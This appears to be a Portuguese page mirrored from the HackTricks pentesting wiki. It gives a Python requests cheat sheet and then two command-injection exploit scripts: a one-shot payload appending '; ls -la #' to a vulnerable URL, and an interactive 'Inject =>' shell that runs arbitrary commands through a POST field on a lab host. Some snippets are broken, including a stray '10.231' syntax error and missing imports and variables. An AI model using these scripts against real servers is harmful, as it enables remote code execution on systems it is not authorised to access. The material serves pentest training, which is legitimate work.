mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-25 19:35:12 +00:00
157 lines
8.2 KiB
Markdown
157 lines
8.2 KiB
Markdown
# Solicitações da Web
|
|
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
|
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Compartilhe seus truques de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [repositório hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
|
|
</details>
|
|
|
|
<figure><img src="/.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
\
|
|
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir e **automatizar fluxos de trabalho** com facilidade, utilizando as ferramentas comunitárias mais avançadas do mundo.\
|
|
Obtenha acesso hoje:
|
|
|
|
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
|
|
|
|
|
## Solicitações Python
|
|
```python
|
|
import requests
|
|
|
|
url = "http://example.com:80/some/path.php"
|
|
params = {"p1":"value1", "p2":"value2"}
|
|
headers = {"User-Agent": "fake User Agent", "Fake header": "True value"}
|
|
cookies = {"PHPSESSID": "1234567890abcdef", "FakeCookie123": "456"}
|
|
proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
|
|
|
|
#Regular Get requests sending parameters (params)
|
|
gr = requests.get(url, params=params, headers=headers, cookies=cookies, verify=False, allow_redirects=True)
|
|
|
|
code = gr.status_code
|
|
ret_headers = gr.headers
|
|
body_byte = gr.content
|
|
body_text = gr.text
|
|
ret_cookies = gr.cookies
|
|
is_redirect = gr.is_redirect
|
|
is_permanent_redirect = gr.is_permanent_redirect
|
|
float_seconds = gr.elapsed.total_seconds() 10.231
|
|
|
|
#Regular Post requests sending parameters (data)
|
|
pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)
|
|
|
|
#Json Post requests sending parameters(json)
|
|
pr = requests.post(url, json=params, headers=headers, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)
|
|
|
|
#Post request sending a file(files) and extra values
|
|
filedict = {"<FILE_PARAMETER_NAME>" : ("filename.png", open("filename.png", 'rb').read(), "image/png")}
|
|
pr = requests.post(url, data={"submit": "submit"}, files=filedict)
|
|
|
|
#Useful for presenting results in boolean/time based injections
|
|
print(f"\rflag: {flag}{char}", end="")
|
|
|
|
|
|
|
|
|
|
##### Example Functions
|
|
target = "http://10.10.10.10:8000"
|
|
proxies = {}
|
|
s = requests.Session()
|
|
|
|
def register(username, password):
|
|
resp = s.post(target + "/register", data={"username":username, "password":password, "submit": "Register"}, proxies=proxies, verify=0)
|
|
return resp
|
|
|
|
def login(username, password):
|
|
resp = s.post(target + "/login", data={"username":username, "password":password, "submit": "Login"}, proxies=proxies, verify=0)
|
|
return resp
|
|
|
|
def get_info(name):
|
|
resp = s.post(target + "/projects", data={"name":name, }, proxies=proxies, verify=0)
|
|
guid = re.match('<a href="\/info\/([^"]*)">' + name + '</a>', resp.text)[1]
|
|
return guid
|
|
|
|
def upload(guid, filename, data):
|
|
resp = s.post(target + "/upload/" + guid, data={"submit": "upload"}, files={"file":(filename, data)}, proxies=proxies, verify=0)
|
|
guid = re.match('"' + filename + '": "([^"]*)"', resp.text)[1]
|
|
return guid
|
|
|
|
def json_search(guid, search_string):
|
|
resp = s.post(target + "/api/search/" + guid + "/", json={"search":search_string}, headers={"Content-Type": "application/json"}, proxies=proxies, verify=0)
|
|
return resp.json()
|
|
|
|
def get_random_string(guid, path):
|
|
return ''.join(random.choice(string.ascii_letters) for i in range(10))
|
|
```
|
|
## Comando Python para explorar uma RCE
|
|
|
|
Para explorar uma RCE (Execução Remota de Código) usando Python, você pode usar a biblioteca `requests` para enviar uma solicitação HTTP para o alvo e executar comandos no servidor. Aqui está um exemplo de comando Python para explorar uma RCE:
|
|
|
|
```python
|
|
import requests
|
|
|
|
target_url = "http://www.exemplo.com/vulneravel.php"
|
|
command = "ls -la"
|
|
|
|
payload = "; " + command + " #"
|
|
|
|
response = requests.get(target_url + payload)
|
|
|
|
print(response.text)
|
|
```
|
|
|
|
Neste exemplo, `target_url` é a URL do arquivo vulnerável no servidor, e `command` é o comando que você deseja executar. O payload é construído adicionando o comando ao final da solicitação HTTP como um parâmetro. O caractere `;` é usado para separar o comando existente do comando que você deseja executar. O caractere `#` é usado para comentar o restante da linha e evitar erros de sintaxe.
|
|
|
|
Após enviar a solicitação, você pode imprimir a resposta para ver a saída do comando executado no servidor. Lembre-se de que a exploração de uma RCE é uma atividade ilegal, a menos que você tenha permissão explícita do proprietário do sistema-alvo.
|
|
```python
|
|
import requests
|
|
import re
|
|
from cmd import Cmd
|
|
|
|
class Terminal(Cmd):
|
|
prompt = "Inject => "
|
|
|
|
def default(self, args):
|
|
output = RunCmd(args)
|
|
print(output)
|
|
|
|
def RunCmd(cmd):
|
|
data = { 'db': f'lol; echo -n "MYREGEXP"; {cmd}; echo -n "MYREGEXP2"' }
|
|
r = requests.post('http://10.10.10.127/select', data=data)
|
|
page = r.text
|
|
m = re.search('MYREGEXP(.*?)MYREGEXP2', page, re.DOTALL)
|
|
if m:
|
|
return m.group(1)
|
|
else:
|
|
return 1
|
|
|
|
|
|
term = Terminal()
|
|
term.cmdloop()
|
|
```
|
|
<figure><img src="/.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
\
|
|
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir e automatizar facilmente fluxos de trabalho com as ferramentas comunitárias mais avançadas do mundo.\
|
|
Acesse hoje:
|
|
|
|
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
|
|
|
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? Ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
|
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [repositório hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
|
|
</details>
|